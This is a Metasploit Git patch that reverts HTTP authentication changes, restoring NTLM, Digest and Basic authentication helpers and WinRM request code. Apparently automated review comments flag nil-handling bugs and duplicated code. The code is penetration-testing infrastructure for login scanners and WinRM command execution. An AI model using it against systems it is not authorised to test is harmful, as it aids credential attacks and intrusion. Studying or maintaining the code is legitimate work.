From 8ddc19e8421b94995d76f9c9addc7266f119f86e Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Mon, 11 Feb 2013 20:49:55 -0600 Subject: [PATCH 364/421] Unmerge #1476 and #1444 In that order. #1476 was an attempt to salvage the functionality, but sinn3r found some more bugs. So, undoing that, and undoing #1444 as well. First, do no harm. It's obvious we cannot be making sweeping changes in libraries like this without a minimum of testing available. #1478 starts to address that, by the way. FixRM #7752 --- lib/anemone/rex_http.rb | 4 +- lib/msf/core/auxiliary/crawler.rb | 16 +- lib/msf/core/auxiliary/web/http.rb | 14 +- lib/msf/core/exploit/http/client.rb | 265 +++++++++- lib/msf/core/exploit/mixins.rb | 1 - lib/msf/core/exploit/winrm.rb | 122 ++++- lib/rex/proto/http/client.rb | 488 ++---------------- lib/rex/proto/http/request.rb | 2 - modules/auxiliary/gather/shodan_search.rb | 4 +- .../scanner/http/cisco_device_manager.rb | 4 +- modules/auxiliary/scanner/http/http_login.rb | 186 ++++++- .../scanner/http/tomcat_mgr_login.rb | 10 +- modules/auxiliary/scanner/winrm/winrm_cmd.rb | 4 + .../auxiliary/scanner/winrm/winrm_login.rb | 6 +- modules/auxiliary/scanner/winrm/winrm_wql.rb | 7 +- modules/auxiliary/server/http_ntlmrelay.rb | 3 +- .../linux/http/piranha_passwd_exec.rb | 6 +- modules/exploits/multi/http/axis2_deployer.rb | 4 +- .../exploits/multi/http/jboss_bshdeployer.rb | 3 + .../exploits/multi/http/jboss_maindeployer.rb | 3 + .../exploits/multi/http/tomcat_mgr_deploy.rb | 14 +- .../unix/webapp/oracle_vm_agent_utl.rb | 3 + modules/exploits/windows/http/easyftp_list.rb | 4 +- .../windows/http/xampp_webdav_upload_php.rb | 10 +- .../windows/winrm/winrm_script_exec.rb | 24 +- 25 files changed, 650 insertions(+), 557 deletions(-) diff --git a/lib/anemone/rex_http.rb b/lib/anemone/rex_http.rb index f606f289fc27..ce6a71a17ff7 100644 --- a/lib/anemone/rex_http.rb +++ b/lib/anemone/rex_http.rb 
@@ -188,9 +188,7 @@ def connection(url) context, url.scheme == "https", 'SSLv23', - @opts[:proxies], - @opts[:username], - @opts[:password] + @opts[:proxies] ) conn.set_config( diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb index 86792381ed24..36e963ecbc8f 100644 --- a/lib/msf/core/auxiliary/crawler.rb +++ b/lib/msf/core/auxiliary/crawler.rb @@ -22,9 +22,7 @@ def initialize(info = {}) Opt::Proxies, OptInt.new('MAX_PAGES', [ true, 'The maximum number of pages to crawl per URL', 500]), OptInt.new('MAX_MINUTES', [ true, 'The maximum number of minutes to spend on each URL', 5]), - OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]), - OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication']) + OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]) ], self.class ) @@ -36,6 +34,8 @@ def initialize(info = {}) OptString.new('UserAgent', [true, 'The User-Agent header to use for all requests', "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" ]), + OptString.new('BasicAuthUser', [false, 'The HTTP username to specify for basic authentication']), + OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), OptString.new('HTTPAdditionalHeaders', [false, "A list of additional headers to send (separated by \\x01)"]), OptString.new('HTTPCookie', [false, "A HTTP cookie header to send with each request"]), OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), 
@@ -118,9 +118,8 @@ def run :info => "" }) - if datastore['USERNAME'] and datastore['USERNAME'] != '' - t[:username] = datastore['USERNAME'].to_s - t[:password] = datastore['PASSWORD'].to_s + if datastore['BasicAuthUser'] + t[:http_basic_auth] = [ "#{datastore['BasicAuthUser']}:#{datastore['BasicAuthPass']}" ].pack("m*").gsub(/\s+/, '') end if datastore['HTTPCookie'] @@ -279,8 +278,9 @@ def crawler_options(t) opts[:cookies] = t[:cookies] end - opts[:username] = t[:username] || '' - opts[:password] =t[:password] || '' + if t[:http_basic_auth] + opts[:http_basic_auth] = t[:http_basic_auth] + end opts end diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 03411e286e20..a7c8fc86e38c 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -10,7 +10,6 @@ module Msf class Auxiliary::Web::HTTP - class Request attr_accessor :url attr_reader :opts @@ -70,7 +69,6 @@ def timed_out attr_reader :framework attr_accessor :redirect_limit - attr_accessor :username , :password def initialize( opts = {} ) @opts = opts.dup @@ -86,8 +84,8 @@ def initialize( opts = {} ) @request_opts = {} if opts[:auth].is_a? Hash - @username = opts[:auth][:user].to_s - @password = opts[:auth][:password].to_s + @request_opts['basic_auth'] = [ opts[:auth][:user].to_s + ':' + + opts[:auth][:password] ]. pack( 'm*' ).gsub( /\s+/, '' ) end self.redirect_limit = opts[:redirect_limit] || 20 @@ -107,9 +105,7 @@ def connect opts[:target].port, {}, opts[:target].ssl, - 'SSLv23', - username, - password + 'SSLv23' ) c.set_config({ @@ -300,10 +296,6 @@ def _request( url, opts = {} ) opts['data'] = body if body c = connect - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out 
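Review bot: In `Auxiliary::Web::HTTP#initialize` (hunk `@@ -86,8 +84,8 @@`) the restored Basic credential is built as `opts[:auth][:user].to_s + ':' + opts[:auth][:password]`, and the password operand has no `.to_s`, so a nil or non-String `:password` raises TypeError while the object is being constructed. The lines being removed converted both values with `.to_s`. Suggest `[ "#{opts[:auth][:user]}:#{opts[:auth][:password]}" ].pack( 'm*' ).gsub( /\s+/, '' )`, which is also how `crawler.rb` builds `t[:http_basic_auth]` in this commit. The initializer starts and ends outside the hunk.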
diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 293a4acd4cc0..6d0bd9336b51 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -37,9 +37,7 @@ def initialize(info = {}) Opt::RHOST, Opt::RPORT(80), OptString.new('VHOST', [ false, "HTTP server virtual host" ]), - Opt::Proxies, - OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), + Opt::Proxies ], self.class ) @@ -48,6 +46,10 @@ def initialize(info = {}) OptString.new('UserAgent', [false, 'The User-Agent header to use for all requests', Rex::Proto::Http::Client::DefaultUserAgent ]), + OptString.new('BasicAuthUser', [false, 'The HTTP username to specify for basic authentication']), + OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), + OptString.new('DigestAuthUser', [false, 'The HTTP username to specify for digest authentication']), + OptString.new('DigestAuthPassword', [false, 'The HTTP password to specify for digest authentication']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]), @@ -154,9 +156,7 @@ def connect(opts={}) }, dossl, ssl_version, - proxies, - datastore['USERNAME'], - datastore['PASSWORD'] + proxies ) # Configure the HTTP client with the supplied parameter 
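Review bot: The four restored auth options in hunk `@@ -48,6 +46,10 @@` are named inconsistently: `BasicAuthPass` sits next to `DigestAuthPassword`. `basic_auth` and `send_digest_request_cgi`, later in this file, read exactly those keys, so a user who sets `DigestAuthPass` by analogy ends up with the empty-string fallback as the digest password. If the names must stay for compatibility with existing modules, the description should say so, e.g. `'The HTTP password to specify for digest authentication (the option is DigestAuthPassword, not DigestAuthPass)'`. The enclosing option list starts and ends outside the hunk.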
@@ -184,15 +184,7 @@ def connect(opts={}) 'pad_post_params_count' => datastore['HTTP::pad_post_params_count'], 'uri_fake_end' => datastore['HTTP::uri_fake_end'], 'uri_fake_params_start' => datastore['HTTP::uri_fake_params_start'], - 'header_folding' => datastore['HTTP::header_folding'], - 'usentlm2_session' => datastore['NTLM::UseNTLM2_session'], - 'use_ntlmv2' => datastore['NTLM::UseNTLMv2'], - 'send_lm' => datastore['NTLM::SendLM'], - 'send_ntlm' => datastore['NTLM::SendNTLM'], - 'SendSPN' => datastore['NTLM::SendSPN'], - 'UseLMKey' => datastore['NTLM::UseLMKey'], - 'domain' => datastore['DOMAIN'], - 'DigestAuthIIS' => datastore['DigestAuthIIS'] + 'header_folding' => datastore['HTTP::header_folding'] ) # If this connection is global, persist it @@ -274,10 +266,6 @@ def send_request_raw(opts={}, timeout = 20) def send_request_cgi(opts={}, timeout = 20) begin c = connect(opts) - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end r = c.request_cgi(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error 
@@ -289,8 +277,241 @@ def send_request_cgi(opts={}, timeout = 20) # Combine the user/pass into an auth string for the HTTP Client # def basic_auth - return if not datastore['USERNAME'] - datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') + return if not datastore['BasicAuthUser'] + datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') + end + + # + # Connect to the server, and perform NTLM authentication for this session. + # Note the return value is [resp,c], so the caller can have access to both + # the last response, and the connection itself -- this is important since + # NTLM auth is bound to this particular TCP session. + # + # TODO: Fix up error messaging a lot more -- right now it's pretty hard + # to tell what all went wrong. + # + def send_http_auth_ntlm(opts={}, timeout = 20) + #ntlm_message_1 = "NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=" + ntlm_options = { + :signing => false, + :usentlm2_session => datastore['NTLM::UseNTLM2_session'], + :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], + :send_lm => datastore['NTLM::SendLM'], + :send_ntlm => datastore['NTLM::SendNTLM'] + } + + ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + domain_name = datastore['DOMAIN'] + + ntlm_message_1 = "NTLM " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, + workstation_name, + ntlmssp_flags)) + to = opts[:timeout] || timeout + begin + c = connect(opts) + + # First request to get the challenge + r = c.request_cgi(opts.merge({ + 'uri' => opts['uri'], + 'method' => 'GET', + 'headers' => { 'Authorization' => ntlm_message_1 }})) + resp = c.send_recv(r, to) + unless resp.kind_of? 
Rex::Proto::Http::Response + return [nil,nil] + end + return [nil,nil] if resp.code == 404 + return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] + + # Get the challenge and craft the response + ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NTLM ([A-Z0-9\x2b\x2f=]+)/i)[1] + return [nil,nil] unless ntlm_challenge + + + #old and simplier method but not compatible with windows 7/2008r2 + #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) + #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) + + ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) + blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + + challenge_key = blob_data[:challenge_key] + server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error + #netbios name + default_name = blob_data[:default_name] || '' + #netbios domain + default_domain = blob_data[:default_domain] || '' + #dns name + dns_host_name = blob_data[:dns_host_name] || '' + #dns domain + dns_domain_name = blob_data[:dns_domain_name] || '' + #Client time + chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' + + spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} + + resp_lm, + resp_ntlm, + client_challenge, + ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, + domain_name, default_name, default_domain, + dns_host_name, dns_domain_name, chall_MsvAvTimestamp, + spnopt, ntlm_options) + + ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], + resp_lm, resp_ntlm, '', ntlmssp_flags) + ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) + + # Send the response + r = c.request_cgi(opts.merge({ + 'uri' => opts['uri'], + 'method' => 'GET', + 'headers' => { 'Authorization' => "NTLM #{ntlm_message_3}"}})) + resp = c.send_recv(r, to, true) + unless 
resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] + end + return [nil,nil] if resp.code == 404 + return [resp,c] + + rescue ::Errno::EPIPE, ::Timeout::Error + end + end + + def send_digest_request_cgi(opts={}, timeout=20) + @nonce_count = 0 + + return [nil,nil] if not (datastore['DigestAuthUser'] or opts['DigestAuthUser']) + to = opts['timeout'] || timeout + + digest_user = datastore['DigestAuthUser'] || opts['DigestAuthUser'] || "" + digest_password = datastore['DigestAuthPassword'] || opts['DigestAuthPassword'] || "" + + method = opts['method'] + path = opts['uri'] + iis = true + if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) + iis = false + end + + begin + @nonce_count += 1 + + resp = opts['response'] + + if not resp + # Get authentication-challenge from server, and read out parameters required + c = connect(opts) + r = c.request_cgi(opts.merge({ + 'uri' => path, + 'method' => method })) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] + end + return [nil,nil] if resp.code == 404 + if resp.code != 401 + return resp + end + return [nil,nil] unless resp.headers['WWW-Authenticate'] + end + + # Don't anchor this regex to the beginning of string because header + # folding makes it appear later when the server presents multiple + # WWW-Authentication options (such as is the case with IIS configured + # for Digest or NTLM). 
+ resp['www-authenticate'] =~ /Digest (.*)/ + + parameters = {} + $1.split(/,[[:space:]]*/).each do |p| + k, v = p.split("=", 2) + parameters[k] = v.gsub('"', '') + end + + qop = parameters['qop'] + + if parameters['algorithm'] =~ /(.*?)(-sess)?$/ + algorithm = case $1 + when 'MD5' then Digest::MD5 + when 'SHA1' then Digest::SHA1 + when 'SHA2' then Digest::SHA2 + when 'SHA256' then Digest::SHA256 + when 'SHA384' then Digest::SHA384 + when 'SHA512' then Digest::SHA512 + when 'RMD160' then Digest::RMD160 + else raise Error, "unknown algorithm \"#{$1}\"" + end + algstr = parameters["algorithm"] + sess = $2 + else + algorithm = Digest::MD5 + algstr = "MD5" + sess = false + end + + a1 = if sess then + [ + algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), + parameters['nonce'], + @cnonce + ].join ':' + else + "#{digest_user}:#{parameters['realm']}:#{digest_password}" + end + + ha1 = algorithm.hexdigest(a1) + ha2 = algorithm.hexdigest("#{method}:#{path}") + + request_digest = [ha1, parameters['nonce']] + request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop + request_digest << ha2 + request_digest = request_digest.join ':' + + # Same order as IE7 + auth = [ + "Digest username=\"#{digest_user}\"", + "realm=\"#{parameters['realm']}\"", + "nonce=\"#{parameters['nonce']}\"", + "uri=\"#{path}\"", + "cnonce=\"#{@cnonce}\"", + "nc=#{'%08x' % @nonce_count}", + "algorithm=#{algstr}", + "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", + # The spec says the qop value shouldn't be enclosed in quotes, but + # some versions of IIS require it and Apache accepts it. Chrome + # and Firefox both send it without quotes but IE does it this way. + # Use the non-compliant-but-everybody-does-it to be as compatible + # as possible by default. The user can override if they don't like + # it. + if qop.nil? then + elsif iis then + "qop=\"#{qop}\"" + else + "qop=#{qop}" + end, + if parameters.key? 
'opaque' then + "opaque=\"#{parameters['opaque']}\"" + end + ].compact + + headers ={ 'Authorization' => auth.join(', ') } + headers.merge!(opts['headers']) if opts['headers'] + + + # Send main request with authentication + r = c.request_cgi(opts.merge({ + 'uri' => path, + 'method' => method, + 'headers' => headers })) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] + end + + return [resp,c] + + rescue ::Errno::EPIPE, ::Timeout::Error + end end ## @@ -501,4 +722,4 @@ def make_cnonce end -end \ No newline at end of file +end diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 6b4db3a54ff6..0e10f7a5a26c 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -94,4 +94,3 @@ # WebApp require 'msf/core/exploit/web' - diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb index 960bff05ce58..72b6a1f7242d 100644 --- a/lib/msf/core/exploit/winrm.rb +++ b/lib/msf/core/exploit/winrm.rb @@ -42,7 +42,7 @@ def winrm_poke(timeout = 20) c = connect(opts) to = opts[:timeout] || timeout ctype = "application/soap+xml;charset=UTF-8" - resp, c = send_winrm_request(opts.merge({ + resp, c = send_request_cgi(opts.merge({ 'uri' => opts['uri'], 'method' => 'POST', 'ctype' => ctype, @@ -61,7 +61,7 @@ def parse_auth_methods(resp) end def winrm_run_cmd(cmd, timeout=20) - resp = send_winrm_request(winrm_open_shell_msg,timeout) + resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil 
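Review bot: Both restored auth helpers in hunk `@@ -289,8 +277,241 @@` parse the server-controlled `WWW-Authenticate` header without checking that the pattern matched. In `send_http_auth_ntlm`, `resp.headers['WWW-Authenticate'].match(/NTLM .../i)[1]` raises NoMethodError when a 401 offers only Basic or Digest, so the `return [nil,nil] unless ntlm_challenge` after it is never reached in that case; capture the match first with `m = resp.headers['WWW-Authenticate'].match(/NTLM ([A-Z0-9\x2b\x2f=]+)/i)` and then `return [nil,nil] unless m`. In `send_digest_request_cgi`, `$1.split` fails the same way when no `Digest` challenge is present; `return [nil,nil] unless resp['www-authenticate'] =~ /Digest (.*)/` covers it. `send_request_ntlm` in `lib/msf/core/exploit/winrm.rb` (hunk `@@ -219,6 +219,98 @@`) repeats the unchecked `.match(...)[1]` with `NEGOTIATE`. Separately, `send_digest_request_cgi` returns a bare `resp` on a non-401 reply but `[resp,c]` elsewhere, and `c` is still nil when the caller supplies `opts['response']`.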
@@ -76,17 +76,17 @@ def winrm_run_cmd(cmd, timeout=20) return retval end shell_id = winrm_get_shell_id(resp) - resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) + resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) - resp = send_winrm_request(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) - resp = send_winrm_request(winrm_delete_shell_msg(shell_id)) + resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) + resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id)) return streams end def winrm_run_cmd_hanging(cmd, timeout=20) - resp = send_winrm_request(winrm_open_shell_msg,timeout) + resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil @@ -101,9 +101,9 @@ def winrm_run_cmd_hanging(cmd, timeout=20) return retval end shell_id = winrm_get_shell_id(resp) - resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) + resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) return streams end 
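Review bot: In `winrm_run_cmd` only the open-shell reply is checked for nil (in the preceding hunk); the command, receive, terminate and delete-shell calls assign `resp,c` and carry straight on. `send_request_ntlm`, added later in this file, returns `[nil,nil]` for a 404, a non-401 first reply or a non-Response object, and nil after `Errno::EPIPE`/`Timeout::Error`, so `winrm_get_cmd_id(resp)` and `winrm_get_cmd_streams(resp)` can receive nil; those helpers are not visible here, so whether they tolerate it needs confirming. A guard such as `return nil if resp.nil?` after each step would make the failure explicit. The following hunk, in `winrm_run_cmd_hanging`, has the same sequence, and `c` is never read in either method.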
@@ -219,6 +219,98 @@ def generate_uuid ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) end + def send_request_ntlm(data, timeout = 20) + opts = { + 'uri' => datastore['URI'], + 'data' => data, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + } + ntlm_options = { + :signing => false, + :usentlm2_session => datastore['NTLM::UseNTLM2_session'], + :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], + :send_lm => datastore['NTLM::SendLM'], + :send_ntlm => datastore['NTLM::SendNTLM'] + } + ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + domain_name = datastore['DOMAIN'] + ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, + workstation_name, + ntlmssp_flags)) + to = opts[:timeout] || timeout + begin + c = connect(opts) + ctype = "application/soap+xml;charset=UTF-8" + # First request to get the challenge + r = c.request_cgi(opts.merge({ + 'uri' => opts['uri'], + 'method' => 'POST', + 'ctype' => ctype, + 'headers' => { 'Authorization' => ntlm_message_1}, + 'data' => opts['data'] + })) + resp = c.send_recv(r, to) + unless resp.kind_of? 
Rex::Proto::Http::Response + return [nil,nil] + end + return [nil,nil] if resp.code == 404 + return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] + # Get the challenge and craft the response + ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1] + return [nil,nil] unless ntlm_challenge + + #old and simplier method but not compatible with windows 7/2008r2 + #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) + #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) + ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) + blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + challenge_key = blob_data[:challenge_key] + server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error + #netbios name + default_name = blob_data[:default_name] || '' + #netbios domain + default_domain = blob_data[:default_domain] || '' + #dns name + dns_host_name = blob_data[:dns_host_name] || '' + #dns domain + dns_domain_name = blob_data[:dns_domain_name] || '' + #Client time + chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' + spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} + resp_lm, + resp_ntlm, + client_challenge, + ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, + domain_name, default_name, default_domain, + dns_host_name, dns_domain_name, chall_MsvAvTimestamp, + spnopt, ntlm_options) + ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], + resp_lm, resp_ntlm, '', ntlmssp_flags) + ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) + # Send the response + r = c.request_cgi(opts.merge({ + 'uri' => opts['uri'], + 'method' => 'POST', + 'ctype' => ctype, + 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"}, + 'data' => opts['data'] + })) + resp = 
c.send_recv(r, to, true) + unless resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] + end + return [nil,nil] if resp.code == 404 + return [resp,c] + rescue ::Errno::EPIPE, ::Timeout::Error + end + end + + def accepts_ntlm_auth + parse_auth_methods(winrm_poke).include? "Negotiate" + end + def target_url proto = "http" if rport == 5986 or datastore['SSL'] @@ -237,18 +329,6 @@ def wmi_namespace return "/root/cimv2/" end - def send_winrm_request(data, timeout=20) - opts = { - 'uri' => datastore['URI'], - 'method' => 'POST', - 'data' => data, - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'], - 'ctype' => "application/soap+xml;charset=UTF-8" - } - send_request_cgi(opts,timeout) - end - private diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 75ba1f957492..0572ea02ffe4 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -2,11 +2,6 @@ require 'rex/socket' require 'rex/proto/http' require 'rex/text' -require 'digest' -require 'rex/proto/ntlm/crypt' -require 'rex/proto/ntlm/constants' -require 'rex/proto/ntlm/utils' -require 'rex/proto/ntlm/exceptions' module Rex module Proto @@ -26,15 +21,13 @@ class Client # # Creates a new client instance # - def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil, username = '', password = '') + def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil) self.hostname = host self.port = port.to_i self.context = context self.ssl = ssl self.ssl_version = ssl_version self.proxies = proxies - self.username = username - self.password = password self.config = { 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, 
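Review bot: `send_request_ntlm` (hunk `@@ -219,6 +219,98 @@`) is a near line-for-line copy of `send_http_auth_ntlm`, which this same commit restores in `lib/msf/core/exploit/http/client.rb`; the visible differences are the `NEGOTIATE` scheme token, the POST method and the SOAP `ctype`. Two copies of the handshake mean any fix to challenge parsing has to be made twice, so consider passing the scheme and request options into one shared helper. Within this copy, `to = opts[:timeout] || timeout` can never pick up an override, because `opts` is the local hash built a few lines earlier with string keys only; `to = timeout` says the same thing. `server_ntlmssp_flags`, `client_challenge` and `ntlm_cli_challenge` are assigned and not read in the visible code.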
@@ -68,21 +61,7 @@ def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, prox 'uri_fake_end' => false, # bool 'uri_fake_params_start' => false, # bool 'header_folding' => false, # bool - 'chunked_size' => 0, # integer - # - # NTLM Options - # - 'usentlm2_session' => true, - 'use_ntlmv2' => true, - 'send_lm' => true, - 'send_ntlm' => true, - 'SendSPN' => true, - 'UseLMKey' => false, - 'domain' => 'WORKSTATION', - # - # Digest Options - # - 'DigestAuthIIS' => true + 'chunked_size' => 0 # integer } # This is not used right now... 
@@ -151,44 +130,27 @@ def set_config(opts = {}) # # Create an arbitrary HTTP request # - # @param opts [Hash] - # @option opts 'agent' [String] User-Agent header value - # @option opts 'basic_auth' [String] Basic-Auth header value - # @option opts 'connection' [String] Connection header value - # @option opts 'cookie' [String] Cookie header value - # @option opts 'data' [String] HTTP data (only useful with some methods, see rfc2616) - # @option opts 'encode' [Bool] URI encode the supplied URI, default: false - # @option opts 'headers' [Hash] HTTP headers, e.g. <code>{ "X-MyHeader" => "value" }</code> - # @option opts 'method' [String] HTTP method to use in the request, not limited to standard methods defined by rfc2616, default: GET - # @option opts 'proto' [String] protocol, default: HTTP - # @option opts 'query' [String] raw query string - # @option opts 'raw_headers' [Hash] HTTP headers - # @option opts 'uri' [String] the URI to request - # @option opts 'version' [String] version of the protocol, default: 1.1 - # @option opts 'vhost' [String] Host header value - # - # @return [Request] def request_raw(opts={}) - c_ag = opts['agent'] || config['agent'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - c_body = opts['data'] || '' - c_conn = opts['connection'] - c_cook = opts['cookie'] || config['cookie'] c_enc = opts['encode'] || false - c_head = opts['headers'] || config['headers'] || {} - c_host = opts['vhost'] || config['vhost'] || self.hostname + c_uri = opts['uri'] || '/' + c_body = opts['data'] || '' c_meth = opts['method'] || 'GET' c_prot = opts['proto'] || 'HTTP' + c_vers = opts['version'] || config['version'] || '1.1' c_qs = opts['query'] + c_ag = opts['agent'] || config['agent'] + c_cook = opts['cookie'] || config['cookie'] + c_host = opts['vhost'] || config['vhost'] || self.hostname + c_head = opts['headers'] || config['headers'] || {} c_rawh = opts['raw_headers']|| config['raw_headers'] || '' - c_uri = opts['uri'] || '/' - c_vers = 
opts['version'] || config['version'] || '1.1' + c_conn = opts['connection'] + c_auth = opts['basic_auth'] || config['basic_auth'] || '' # An agent parameter was specified, but so was a header, prefer the header if c_ag and c_head.keys.map{|x| x.downcase }.include?('user-agent') c_ag = nil end - + uri = set_uri(c_uri) req = '' @@ -208,10 +170,9 @@ def request_raw(opts={}) req << set_host_header(c_host) req << set_agent_header(c_ag) + if (c_auth.length > 0) - unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" - req << set_basic_auth_header(c_auth) - end + req << set_basic_auth_header(c_auth) end req << set_cookie_header(c_cook) 
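Review bot: `request_raw` (hunk `@@ -151,44 +130,27 @@`) is left with only the one-line `# Create an arbitrary HTTP request` comment, although it reads fourteen option keys and now returns the raw request string rather than a `Request` object (see the `req` return in the hunk after next). `request_cgi` gets a plain `# Options:` list back in this commit; `request_raw` should carry the same list minus `ctype`, `encode_params`, `vars_get` and `vars_post`, plus a line such as `# Returns the request as a String`. The method body continues outside the hunk.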
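Review bot: In hunk `@@ -208,10 +170,9 @@`, `req << set_basic_auth_header(c_auth)` now runs whenever `basic_auth` is non-empty, even if the caller also passed an `Authorization` entry in `headers`. `send_http_auth_ntlm` and `send_digest_request_cgi` do pass their own `Authorization` header through `request_cgi`, so if `config['basic_auth']` is set on that client the request would presumably carry both, including the base64 Basic credential on a connection meant for NTLM or Digest. Skipping the Basic header when one is already supplied, `unless c_head.keys.any? { |k| k.downcase == 'authorization' }`, avoids that. The same applies to the `request_cgi` hunk `@@ -317,9 +285,7 @@`.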
